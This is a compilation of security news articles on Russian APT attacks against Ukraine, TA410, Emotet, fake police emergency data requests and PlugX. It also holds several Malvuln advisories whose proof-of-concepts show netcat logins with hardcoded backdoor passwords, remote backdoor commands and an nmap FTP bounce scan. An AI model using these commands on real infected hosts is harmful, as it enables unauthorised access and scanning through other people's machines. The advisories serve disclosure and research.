At least five APTs are believed involved with attacks tied ground campaigns and designed to damage Ukraine's digital infrastructure.

At least five APTs are believed involved with attacks tied ground campaigns and designed to damage Ukraine’s digital infrastructure.

Cyberattacks against Ukraine have been used strategically to support ground campaigns, with five state-sponsored advanced persistent threat (APT) groups behind attacks that began in February. According to research published by Microsoft on Wednesday, the APTs involved in the campaigns are state-sponsored by Russia.

Separate reports published this week also shed new light on the wave of cyberattacks against Ukrainian digital assets by APTs with ties to Russia.

Microsoft researchers believe six separate Russia-aligned threat actors carried out 237 cyber operations that resulted in threats to civilian welfare and attempted to carry out dozens of cyberespionage attacks against Ukrainian targets.

Moreover, Russia is believed to be using cyberattacks in a type of “hybrid war”, according to a blog post by Tom Burt, corporate vice president of Customer Security and Trust at Microsoft. That correlates  “with its kinetic military operations targeting services and institutions crucial for civilians,” he said.

“The attacks have not only degraded the systems of institutions in Ukraine but have also sought to disrupt people’s access to reliable information and critical life services on which civilians depend, and have attempted to shake confidence in the country’s leadership,” Burt wrote.

Meanwhile, researchers at Computer Emergency Response Team of Ukraine (CERT-UA) have been doing analysis of their own on the cyber-attacks that have been hampered the country in the lead up to and during the war.  The agency said it recorded 802 cyber attacks in the first quarter of 2022 alone, more than double the number for the same period last year, which was 362.

Carrying out those attacks are primarily five known Russia or Belarus-sponsored APTs, CERT-UA said. Specifically, those groups are: Armageddon/Garmaredon, UNC1151, Fancy Bear/APT28, AgentTesla/XLoader and Pandora hVNC/GrimPlant/GraphSteel.

****‘Hybrid’ War****

Microsoft security teams have been working closely with Ukrainian government officials as well as both government and private-enterprise cybersecurity staff to identify and remediate threat activity against Ukrainian networks, researchers said.

Russia appears to have been preparing for the land conflict with Ukraine in cyberspace about a year before the war began, or since March 2021, according to the report.

In the lead up to the ground conflict and the subsequent invasion, threat groups with known or suspected ties Russia “continuously developed and used destructive wiper malware or similarly destructive tools on targeted Ukrainian networks at a pace of two to three incidents a week,” researchers found.

“From February 23 to April 8, we saw evidence of nearly 40 discrete destructive attacks that permanently destroyed files in hundreds of systems across dozens of organizations in Ukraine,” they wrote.

Even before that, in January, Microsoft identified a Master Boot Record (MBR) wiper attack that it named WhisperGate targeting Ukraine to permanently disrupt organizations across the country and paint it as a failed state. Wipers are the most destructive of malware types because they permanently delete and destroy data and/or systems, causing great financial and reputational damage to victims.

From late February to mid-March, another series of wiper attacks using malware called HermeticWiper, IsaacWiper and CaddyWiper targeted organizations in the Ukraine as Russia commenced its physical invasion.

****Attacks on Critical Infrastructure****

In its latest report, Microsoft said that more than 40 percent of the destructive attacks against Ukraine were aimed at organizations in critical infrastructure sectors that could have negative second-order effects on the government, military, economy and the country’s people.

Moreover, 32 percent of destructive incidents affected Ukrainian government organizations at the national, regional and city levels.

“Acknowledging that there is ongoing activity that we cannot see, we estimate there have been at least eight destructive malware families deployed on Ukrainian networks, including one tailored to industrial control systems (ICS),” researchers wrote. ” If threat actors can maintain the current pace of development and deployment, we anticipate more destructive malware will be discovered as the conflict continues.”

The report includes a specific timeline of attacks and the malware used in the earliest weeks of the attack to support Russia’s military activities. In addition to the wipers previously mentioned, other malware deployed in the attacks includes: FoxBlade, DesertBlade, FiberLake, SonicVote and Industroyer2.

****Frequent Offenders****

On the heels of CERT-UA’s revelation of the top ATPs pummeling Ukraine in cyberspace, research firm Recorded Future’s The Record took a deeper dive into each other to examine its specific affiliations and modus operandi.

Armageddon/Garmaredon is an aggressive threat actor that’s been targeting Ukraine since 2014 and is backed by the Russian Federal Security Service (FSB). During the Russian war on Ukraine the group has used phishing attacks to distribute malware, most recently new variants of the “Backdoor.Pterodo” malware payload, according to researchers.

UNC1151 is a Belarus-aligned hacking group who has been active since 2016 and has previously targeted government agencies and private organizations in Ukraine, Lithuania, Latvia, Poland and Germany, as well as attacked Belarusian dissidents and journalists, researchers said, citing research from Mandiant.

Since Russia attacked Ukraine UNC1151 the group has been linked to the defacement of multiple Ukrainian government websites as well as spearphishing campaigns targeting the email and facebook accounts of Ukrainian military personnel to spread the MicroBackdoor malware.

Fancy Bear/APT 28 is a well-known and prolific actor active since 2017 and backed by Russia’s military intelligence service (GRU). The politically motivated group has been linked to activity aiming to influence elections in the European Union and the United States as well as attacking sporting authorities connected to the 2020 Tokyo Olympic Games.

On Feb. 24, the day Russia attacked Ukraine, Fancy Bear gained access to U.S. satellite communications provider Viasat’s KA-SAT network in Ukraine, leaving many Ukrainians without internet access and thus communication capability at the critical time when attacks began, researchers said.

Russian threat actors have used the AgentTesla and XLoader malwares since at least 2014 and 2020, respectively; both have been used in high-profile attacks. During Russia’s invasion of Ukraine, one malicious email campaign targeting Ukrainian state organizations used XLoader as its payload, while a phishing campaign targeting Ukrainian citizens spread AgentTesla,, researchers said.

Pandora hVNC/GrimPlant/GraphSteel act as downloaders and droppers under the umbrella term “Elephant Framework,” or tools that are written in the same language and used to target government organizations through phishing attacks, researchers said. In two separate malicious phishing campaigns in March, they were used against Ukrainian targets to steal sensitive information from government officials, among others, they said.

**History of Cyberattacks in Ukraine**

In March, Kaspersky’s Global Research and Analysis Team (GReAT) outlined its’ tracking of current and past cyberattacks in Ukraine.

Courtesy of Kaspersky

“The number of cyberattacks in Ukraine will increase during the next six months. While most of the current attacks are of low complexity – such as DDoS or attacks using commodity and low-quality tools – more sophisticated attacks exist also, and more are expected to come,” Kaspersky researchers wrote.

“Current complex activities include the employment of HermeticWiper, which stands out due to its sophistication, as well as the Viasat ‘cyber event’ – the partial network outage that impacted internet service for fixed broadband customers in Ukraine and elsewhere on the European KA-SAT network that affected over 30,000 plus terminals in Europe,” the Kaspersky report added.

Cyberattacks Rage in Ukraine, Support Military Operations

A cyberespionage threat actor known for targeting a variety of critical infrastructure sectors in Africa, the Middle East, and the U.S. has been observed using an upgraded version of a remote access trojan with information stealing capabilities.
Calling TA410 an umbrella group comprised of three teams dubbed FlowingFrog, LookingFrog and JollyFrog, Slovak cybersecurity firm ESET assessed that "

A cyberespionage threat actor known for targeting a variety of critical infrastructure sectors in Africa, the Middle East, and the U.S. has been observed using an upgraded version of a remote access trojan with information stealing capabilities.

Calling **TA410** an umbrella group comprised of three teams dubbed FlowingFrog, LookingFrog and JollyFrog, Slovak cybersecurity firm ESET assessed that "these subgroups operate somewhat independently, but that they may share intelligence requirements, an access team that runs their spear-phishing campaigns, and also the team that deploys network infrastructure."

TA410 — said to share behavioral and tooling overlaps with APT10 (aka Stone Panda or TA429) — has a history of targeting U.S-based organizations in the utilities sector as well as diplomatic entities in the Middle East and Africa.

Other victims of the hacker collective include a manufacturing company in Japan, a mining business in India, and a charity in Israel, in addition to unnamed victims in the education and military verticals.

TA410 was first documented by Proofpoint in August 2019 when the threat actor unleashed phishing campaigns containing macro-laden documents to compromise utility providers across the U.S. with a modular malware called LookBack.

Nearly a year later, the group returned with a new backdoor codenamed FlowCloud, also delivered to U.S. utilities providers, that Proofpoint described as malware that gives attackers complete control over infected systems.

"Its remote access trojan (RAT) functionality includes the ability to access installed applications, the keyboard, mouse, screen, files, services, and processes with the ability to exfiltrate information via command-and-control," the company noted in June 2020.

Industrial cybersecurity firm Dragos, which tracks the activity group under the moniker TALONITE, pointed out the group's penchant for blending techniques and tactics in order to ensure a successful intrusion.

"TALONITE focuses on subverting and taking advantage of trust with phishing lures focusing on engineering-specific themes and concepts, malware that abuses otherwise legitimate binaries or modifies such binaries to include additional functionality, and a combination of owned and compromised network infrastructure," Dragos said in April 2021.

ESET's investigation into the hacking crew's modus operandi and toolset has shed light on a new version of FlowCloud, which comes with the ability to record audio using a computer's microphone, monitor clipboard events, and control attached camera devices to take pictures.

Specifically, the audio recording function is designed to be automatically triggered when sound levels near the compromised computer cross a 65-decibel threshold.

TA410 is also known to take advantage of both spear-phishing and vulnerable internet-facing applications such as Microsoft Exchange, SharePoint, and SQL Servers to gain initial access.

"This indicates to us that their victims are targeted specifically, with the attackers choosing which entry method has the best chance of infiltrating the target," ESET malware researcher Alexandre Côté Cyr said.

Each team within the TA410 umbrella is said to use different toolsets. While JollyFrog relies on off-the-shelf malware such as QuasarRAT and Korplug (aka PlugX), LookingFrog uses X4, a barebones implant, and LookBack.

FlowingFrog, in contrast, employs a downloader called Tendyron that's delivered by means of the Royal Road RTF weaponizer, using it to download FlowCloud as well as a second backdoor, which is based on Gh0stRAT (aka Farfli).

"TA410 is a cyberespionage umbrella targeting high-profile entities such as governments and universities worldwide," ESET said. "Even though the JollyFrog team uses generic tools, FlowingFrog and LookingFrog have access to complex implants such as FlowCloud and LookBack."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Experts Detail 3 Hacking Teams Working Under the Umbrella of TA410 Group

The Botnet appears to use a new delivery method for compromising Windows systems after Microsoft disables VBA macros by default.

The Botnet appears to use a new delivery method for compromising Windows systems after Microsoft disables VBA macros by default.

Emotet malware attacks are back after a 10-month “spring break” – with criminals behind the attack rested, tanned and ready to launch a new campaign strategy. That new approach includes more targeted phishing attacks, different from the previous spray-and-pray campaigns, according to new research.

Proofpoint analysts linked this activity to the threat actor known as TA542, which since 2014 has leveraged the Emotet malware with great success, according to a Tuesday report.

Emotet, once dubbed “the most dangerous malware in the world” is being leveraged in its most recent campaign to deliver ransomware. Those behind distributing the malware have been in law enforcement’s crosshairs for years.  In  January  2021, authorities in Canada, France, Germany, Lithuania, the Netherlands, Ukraine, the United Kingdom and the United States worked together to take down a network of hundreds of botnet servers supporting Emotet, as part of “Operation LadyBird.”

The latest activity observed by researchers occurred while Emotet was on a “spring break.” Efforts were lowkey and likely an attempt to test new tactics without drawing attention. Now, researchers say TA542 has ramped up attacks to typical high-volume threat campaigns. “The threat actor has since resumed its typical activity,” Proofpoint said.

Cybersecurity researchers from AdvIntel, Crypolaemus confirmed Proofpoint’s observations, both observing the Emotet’s return after a 10-months gap. According to those researchers, attackers behind the malware have sent millions of phishing emails designed to infect the devices with malware and can be controlled by botnets.

> 2021-11-14: 🔥The "#Emotet partner ($) loader" program appears resorcing from existing #TrickBot infections.
> 
> 📌TrickBot launched what appears to be the newer Emotet loader.  
> 👇https://t.co/nVugStaAvE https://t.co/GHupFlENaQ
> 
> — Vitali Kremez (@VK\_Intel) November 15, 2021

****New Phase of Emotet****

In its report, Proofpoint researchers noted that this new testing of phishing emails could be the result of Microsoft’s actions to disable specific macros associated with Office apps in February 2022. At the time Microsoft said it was changing defaults for five Office apps that run macros.  This prevents attackers from targeting documents with automation services to execute the malware on victims’ systems.

According to cybersecurity researchers at Proofpoint, the new techniques observed in recent campaigns appeared to be tested on a smaller scale, as a test for potential be used for a larger campaign.

The new campaigns use compromised email accounts to send out spam-phishing emails with a one-word headline. Common terms in phishing attacks included “salary” are used to encourage users to click out of curiosity, found by the ProofPoint cybersecurity researchers.

The message body contains a OneDrive URL. This URL hosts Zip files containing Microsoft Excel Add-in (XLL) files with a similar name to the email subject line.

If these XLL files are opened and executed, Emotet will infect the machine with malware. Further, it can steal the information or create a backdoor for deploying other malwares to compromise the Windows system.

According to cybersecurity researchers at Proofpoint, the use of OneDrive URLs and XLL makes this campaign distinct from previous ones. Earlier Emotet attempted to spread itself via Microsoft Office attachments or phishing URLs. Those malicious payloads included Word and Excel documents containing Visual Basics for Applications (VBA) scripts or macros.

The attacks associated with this new campaign took place between April 4, 2022 and April 19, 2022, when other widespread Emotet campaigns were put on hold, researchers said.

“After months of consistent activity, Emotet is switching things up. It is likely the threat actor is testing new behaviors on a small scale before delivering them to victims more broadly, or to distribute via new TTPs (Tactics, Techniques, and Procedures) alongside its existing high-volume campaigns,” said Sherrod DeGrippo, vice president of threat research and detection at Proofpoint.

“Organizations should be aware of the new techniques and ensure they are implementing defenses accordingly,” she added.

“Train users to spot and report malicious email. Regular training and simulated attacks can stop many attacks and help identify people who are especially vulnerable” DeGrippo explained.

In another development malware, authors patched the issue, which prevented potential victims from getting compromised upon clicking on the malicious email attachments.  

Reported By: Sagar Tiwari, an independent security researcher and technical writer.

Emotet is Back From ‘Spring Break’ With New Nasty Tricks

Backdoor.Win32.Agent.aegg malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln - malvuln.com (c) 2022Original source: https://malvuln.com/advisory/58be35e792476d1c015df7853112d200.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Agent.aegg Vulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP port 8665. Authentication is required, however the password "Xc 2870508" is weak and hardcoded within the PE file.Family: AgentType: PE32MD5: 58be35e792476d1c015df7853112d200Vuln ID: MVID-2022-0571Dropped files: ck.regDisclosure: 04/26/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 8665Welcome to XC Doc Server!Login rootLoginFailedC:\nc64.exe x.x.x.x 8665Welcome to XC Doc Server!Login Xc 2870508LoginOKComputerNameDESKTOP-2C3IQHOStartVideoStartVideoOKGetDrivesC:\D:\....Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.aegg Hardcoded Credential

Backdoor.Win32.GF.j malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln - malvuln.com (c) 2022Original source: https://malvuln.com/advisory/fa00524d7289cdba327d5c34ab3d9bd7.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.GF.jVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 21554. Third-party adversaries who can reach infected hosts can run commands made available by the backdoor.Eg. commandssetport (change port)RESETALL (resets to default port)KillHER (terminates backdoor)Family: GFType: PE32MD5: fa00524d7289cdba327d5c34ab3d9bd7Vuln ID: MVID-2022-0566Dropped files: Windll.exe Disclosure: 04/26/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 21554setport 666New port:  666KillHERDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.GF.j Remote Command Execution

Backdoor.Win32.Cafeini.b malware suffers from a man-in-the-middle vulnerability.

    Discovery / credits: Malvuln - malvuln.com (c) 2022Original source: https://malvuln.com/advisory/851f8945d1b5923990f4722d627156a0_B.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Cafeini.bVulnerability: Port Bounce ScanDescription: The malware runs an FTP server on TCP port 23. Third-party adversaries who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you.Family: CafeiniType: PE32MD5: 851f8945d1b5923990f4722d627156a0Vuln ID: MVID-2022-0569Disclosure: 04/26/2022Exploit/PoC:C:\>nmap -n -Pn -b test:test@192.168.18.125:23  -p21,22,80 192.168.18.237 -vStarting Nmap 7.80 ( https://nmap.org ) at 2022-04-20 14:50 UTC-11Resolved FTP bounce attack proxy to 192.168.18.125 (192.168.18.125).Attempting connection to ftp://test:test@192.168.18.125:23Connected:220 CAFEiNi 1.1 FTP serverLogin credentials accepted by FTP server!Initiating Bounce Scan at 14:50Removed 22Changed my mind about port 22Removed 21Changed my mind about port 21Discovered open port 80/tcp on 192.168.18.237Completed Bounce Scan at 14:50, 2.21s elapsed (3 total ports)Nmap scan report for 192.168.18.237Host is up.PORT   STATE  SERVICE21/tcp closed ftp22/tcp closed ssh80/tcp open   httpRead data files from: C:\Program Files (x86)\NmapNmap done: 1 IP address (1 host up) scanned in 11.39 secondsDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Cafeini.b Man-In-The-Middle

Backdoor.Win32.Cafeini.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln - malvuln.com (c) 2022Original source: https://malvuln.com/advisory/851f8945d1b5923990f4722d627156a0.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Cafeini.bVulnerability: Weak Hardcoded Credentials Description: The malware listens on TCP port 23. Authentication is required, however the credentials test:test are weak and hardcoded within the PE file.Family: CafeiniType: PE32MD5: 851f8945d1b5923990f4722d627156a0Vuln ID: MVID-2022-0568Disclosure: 04/26/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 23220 CAFEiNi 1.1 FTP serverUSER test331 enter your password (PASS)PASS test230 you're logged in, have a funSYST215 WIN32 L 8 (CAFEiNi 1.1 FTP server)PASV500 unknown command "pasv"HELP214-CAFEiNi 1.1 FTP server supported commands: ABOR CDUP CWD DELE HELP LIST MKD  MODE NOOP PASS PWD  QUIT RETR RMD RNFR RNTO STOR SYST TYPE USER214 and you don't need more commands, I thinkDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Cafeini.b Hardcoded Credential

When KrebsOnSecurity last month explored how cybercriminals were using hacked email accounts at police departments worldwide to obtain warrantless Emergency Data Requests (EDRs) from social media and technology providers, many security experts called it a fundamentally unfixable problem. But don't tell that to Matt Donahue, a former FBI agent who recently quit the agency to launch a startup that aims to help tech companies do a better job screening out phony law enforcement data requests -- in part by assigning trustworthiness or "credit ratings" to law enforcement authorities worldwide.

When KrebsOnSecurity recently explored how cybercriminals were using hacked email accounts at police departments worldwide to obtain warrantless **Emergency Data Requests** (EDRs) from social media firms and technology providers, many security experts called it a fundamentally unfixable problem. But don’t tell that to **Matt Donahue**, a former FBI agent who recently quit the agency to launch a startup that aims to help tech companies do a better job screening out phony law enforcement data requests — in part by assigning trustworthiness or “credit ratings” to law enforcement authorities worldwide.

A sample Kodex dashboard. Image: Kodex.us.

Donahue is co-founder of Kodex, a company formed in February 2021 that builds security portals designed to help tech companies “manage information requests from government agencies who contact them, and to securely transfer data & collaborate against abuses on their platform.”

The 30-year-old Donahue said he left the FBI in April 2020 to start Kodex because it was clear that social media and technology companies needed help validating the increasingly large number of law enforcement requests domestically and internationally.

“So much of this is such an antiquated, manual process,” Donahue said of his perspective gained at the FBI. “In a lot of cases we’re still sending faxes when more secure and expedient technologies exist.”

Donahue said when he brought the subject up with his superiors at the FBI, they would kind of shrug it off, as if to say, “This is how it’s done and there’s no changing it.”

“My bosses told me I was committing career suicide doing this, but I genuinely believe fixing this process will do more for national security than a 20-year career at the FBI,” he said. “This is such a bigger problem than people give it credit for, and that’s why I left the bureau to start this company.”

One of the stated goals of Kodex is to build a scoring or reputation system for law enforcement personnel who make these data requests. After all, there are tens of thousands of police jurisdictions around the world — including roughly 18,000 in the United States alone — and all it takes for hackers to abuse the EDR process is illicit access to a single police email account.

Kodex is trying to tackle the problem of fake EDRs by working directly with the data providers to pool information about police or government officials submitting these requests, and hopefully making it easier for all customers to spot an unauthorized EDR.

Kodex’s first big client was cryptocurrency giant **Coinbase**, which confirmed their partnership but otherwise declined to comment for this story. **Twilio** confirmed it uses Kodex’s technology for law enforcement requests destined for any of its business units, but likewise declined to comment further.

Within their own separate Kodex portals, Twilio can’t see requests submitted to Coinbase, or vice versa. But each can see if a law enforcement entity or individual tied to one of their own requests has ever submitted a request to a different Kodex client, and then drill down further into other data about the submitter, such as Internet address(es) used, and the age of the requestor’s email address.

Donahue said in Kodex’s system, each law enforcement entity is assigned a credit rating, wherein officials who have a long history of sending valid legal requests will have a higher rating than someone sending an EDR for the first time.

“In those cases, we warn the customer with a flash on the request when it pops up that we’re allowing this to come through because the email was verified \[as being sent from a valid police or government domain name\], but we’re trying to verify the emergency situation for you, and we will change that rating once we get new information about the emergency,” Donahue said.

“This way, even if one customer gets a fake request, we’re able to prevent it from happening to someone else,” he continued. “In a lot of cases with fake EDRs, you can see the same email \[address\] being used to message different companies for data. And that’s the problem: So many companies are operating in their own silos and are not able to share information about what they’re seeing, which is why we’re seeing scammers exploit this good faith process of EDRs.”

**NEEDLES IN THE HAYSTACK**

As social media and technology platforms have grown over the years, so have the volumes of requests from law enforcement agencies worldwide for user data. For example, in its latest transparency report mobile giant **Verizon** reported receiving 114,000 data requests of all types from U.S. law enforcement entities in the second half of 2021.

Verizon said _approximately 35,000 of those requests (~30 percent) were EDRs_, and that it provided data in roughly 91 percent of those cases. The company doesn’t disclose how many EDRs came from foreign law enforcement entities during that same time period. Verizon currently asks law enforcement officials to send these requests via fax.

Validating legal requests by domain name may be fine for data demands that include documents like subpoenas and search warrants, which can be validated with the courts. But not so for EDRs, which largely bypass any official review and _do not require the requestor to submit any court-approved documents_.

Police and government authorities can legitimately request EDRs to learn the whereabouts or identities of people who have posted online about plans to harm themselves or others, or in other exigent circumstances such as a child abduction or abuse, or a potential terrorist attack.

But as KrebsOnSecurity reported in March, it is now clear that crooks have figured out there is no quick and easy way for a company that receives one of these EDRs to know whether it is legitimate. Using illicit access to hacked police email accounts, the attackers will send a fake EDR along with an attestation that innocent people will likely suffer greatly or die unless the requested data is provided immediately.

In this scenario, the receiving company finds itself caught between two unsavory outcomes: Failing to immediately comply with an EDR — and potentially having someone’s blood on their hands — or possibly leaking a customer record to the wrong person. That might explain why the compliance rate for EDRs is usually quite high — often upwards of 90 percent.

Fake EDRs have become such a reliable method in the cybercrime underground for obtaining information about account holders that several cybercriminals have started offering services that will submit these fraudulent EDRs on behalf of paying clients to a number of top social media and technology firms.

A fake EDR service advertised on a hacker forum in 2021.

An individual who’s part of the community of crooks that are abusing fake EDR told KrebsOnSecurity the schemes often involve hacking into police department emails by first compromising the agency’s website. From there, they can drop a backdoor “shell” on the server to secure permanent access, and then create new email accounts within the hacked organization.

In other cases, hackers will try to guess the passwords of police department email systems. In these attacks, the hackers will identify email addresses associated with law enforcement personnel, and then attempt to authenticate using passwords those individuals have used at other websites that have been breached previously.

**EDR OVERLOAD?**

Donahue said depending on the industry, EDRs make up between 5 percent and 30 percent of the total volume of requests. In contrast, he said, EDRs amount to less than three percent of the requests sent through Kodex portals used by customers.

KrebsOnSecurity sought to verify those numbers by compiling EDR statistics based on annual or semi-annual transparency reports from some of the largest technology and social media firms. While there are no available figures on the number of fake EDRs each provider is receiving each year, those phony requests can easily hide amid an increasingly heavy torrent of legitimate demands.

**Meta/Facebook** says roughly 11 percent of all law enforcement data requests — 21,700 of them — were EDRs in the first half of 2021. Almost 80 percent of the time the company produced at least some data in response. Facebook has long used its own online portal where law enforcement officials must first register before submitting requests.

Government data requests, including EDRs, received by Facebook over the years. Image: Meta Transparency Report.

**Apple** said it received 1,162 emergency requests for data in the last reporting period it made public — July – December 2020. Apple’s compliance with EDRs was 93 percent worldwide in 2020. Apple’s website says it accepts EDRs via email, after applicants have filled out a supplied PDF form. \[As a lifelong Apple user and customer, I was floored to learn that the richest company in the world — which for several years has banked heavily on privacy and security promises to customers — still relies on email for such sensitive requests\].

**Twitter** says it received 1,860 EDRs in the first half of 2021, or roughly 15 percent of the global information requests sent to Twitter. Twitter accepts EDRs via an interactive form on the company’s website. Twitter reports that EDRs decreased by 25% during this reporting period, while the aggregate number of accounts specified in these requests decreased by 15%. The United States submitted the highest volume of global emergency requests (36%), followed by Japan (19%), and India (12%).

**Discord** reported receiving 378 requests for emergency data disclosure in the first half of 2021. Discord accepts EDRs via a specified email address.

For the six months ending in December 2021, **Snapchat** said it received 2,085 EDRs from authorities in the United States (with a 59 percent compliance rate), and another 1,448 from international police (64 percent granted). Snapchat has a form for submitting EDRs on its website.

**TikTok**‘s resources on government data requests currently lead to a “Page not found” error, but a company spokesperson said TikTok received 715 EDRs in the first half of 2021. That’s up from 409 EDRs in the previous six months. Tiktok handles EDRs via a form on its website.

The current transparency reports for both **Google** and **Microsoft** do not break out EDRs by category. Microsoft says that in the second half of 2021 it received more than 25,000 government requests, and that it complied at least partly with those requests more than 90 percent of the time.

Microsoft runs its own portal that law enforcement officials must register at to submit legal requests, but that portal doesn’t accept requests for other Microsoft properties, such as LinkedIn or Github.

Google said it received more than 113,000 government requests for user data in the last half of 2020, and that about 76 percent of the requests resulted in the disclosure of some user information. Google doesn’t publish EDR numbers, and it did not respond to requests for those figures. Google also runs its own portal for accepting law enforcement data requests.

**Verizon** reports (PDF) receiving more than 35,000 EDRs from just U.S. law enforcement in the second half of 2021, out of a total of 114,000 law enforcement requests (Verizon doesn’t disclose how many EDRs came from foreign law enforcement entities). Verizon said it complied with approximately 91 percent of requests. The company accepts law enforcement requests via snail mail or fax.

Image: Verizon.com.

**AT&T** says (PDF) it received nearly 19,000 EDRs in the second half of 2021; it provided some data roughly 95 percent of the time. AT&T requires EDRs to be faxed.

The most recent transparency report published by **T-Mobile** says the company received more than 164,000 “emergency/911” requests in 2020 — but it does not specifically call out EDRs. Like its old school telco brethren, T-Mobile requires EDRs to be faxed. T-Mobile did not respond to requests for more information.

Data from T-Mobile’s most recent transparency report in 2020. Image: T-Mobile.

Fighting Fake EDRs With ‘Credit Ratings’ for Police

A China-linked government-sponsored threat actor has been observed targeting Russian speakers with an updated version of a remote access trojan called PlugX.
Secureworks attributed the attempted intrusions to a threat actor it tracks as Bronze President, and by the wider cybersecurity community under the monikers Mustang Panda, TA416, HoneyMyte, RedDelta, and PKPLUG.
"The war in Ukraine has

![PlugX Malware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj5xuLJaTB-qBvEp10kBoQBs184MuorHdkHDoJK2GNomCTwuAZTUlvNPt23zXOEMyNE0npV6NPejnz2nh4-Q1qMqlHh45vlNet1SwMt4uucTmdBX_fGmYICIdgwpC8qILbPYGPa0fWJ7rmDb5OpNFMyV6yR4UITUXBDc6QJVoL1SNElO54eTYL2Bbv6/s728-e1000/china-russia.gif "PlugX Malware")

A China-linked government-sponsored threat actor has been observed targeting Russian speakers with an updated version of a remote access trojan called PlugX.

Secureworks attributed the attempted intrusions to a threat actor it tracks as Bronze President, and by the wider cybersecurity community under the monikers Mustang Panda, TA416, HoneyMyte, RedDelta, and PKPLUG.

"The war in Ukraine has prompted many countries to deploy their cyber capabilities to gain insight about global events, political machinations, and motivations," the cybersecurity firm said in a report shared with The Hacker News. "This desire for situational awareness often extends to collecting intelligence from allies and 'friends.'"

Bronze President, active since at least July 2018, has a history of conducting espionage operations by leveraging custom and publicly available tools to compromise, maintain long-term access, and collect data from targets of interest.

![CyberSecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAD6AQMAAAAho+iwAAAAA1BMVEXm5+i1+56pAAAAH0lEQVQYGe3AAQ0AAADCIPuntscHAwAAAAAAAAAAIOQmFgAB/YLDRAAAAABJRU5ErkJggg==)

Chief among its tools is PlugX, a Windows backdoor that enables threat actors to execute a variety of commands on infected systems and which has been employed by several Chinese state-sponsored actors over the years.

The latest findings from Secureworks suggest an expansion of the same campaign previously detailed by Proofpoint and ESET last month, which has involved the use of a new variant of PlugX codenamed Hodur, so labeled owing to its overlaps with another version called THOR that emerged on the scene in July 2021.

![PlugX Malware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjPISpeAfa4WL5oqadRdNrgThQ-LU9yqEyGnwIy1EzaerbYW5zrl1tGgazr6QIT40wbxIKSUn7F5z7HcJbqZcj2XCvV181YArCCbgL8TxDKH4lNqC00Cv_fJSN6p4AekErsps_3ZPT5ovcC2YBf5bngyyrpHiTsPtK2_uzORzluzuZiTHubtNFST2zR/s728-e1000/data.jpg "PlugX Malware")

The attack chain commences with a malicious executable named "Blagoveshchensk - Blagoveshchensk Border Detachment.exe" that masquerades as a seemingly legitimate document with a PDF icon, which, when opened, leads to the deployment of an encrypted PlugX payload from a remote server.

"Blagoveshchensk is a Russian city close to the China border and is home to the 56th Blagoveshchenskiy Red Banner Border Guard Detachment," the researchers said. "This connection suggests that the filename was chosen to target officials or military personnel familiar with the region."

The fact that Russian officials may have been the target of the March 2022 campaign indicates that the threat actor is evolving its tactics in response to the political situation in Europe and the war in Ukraine.

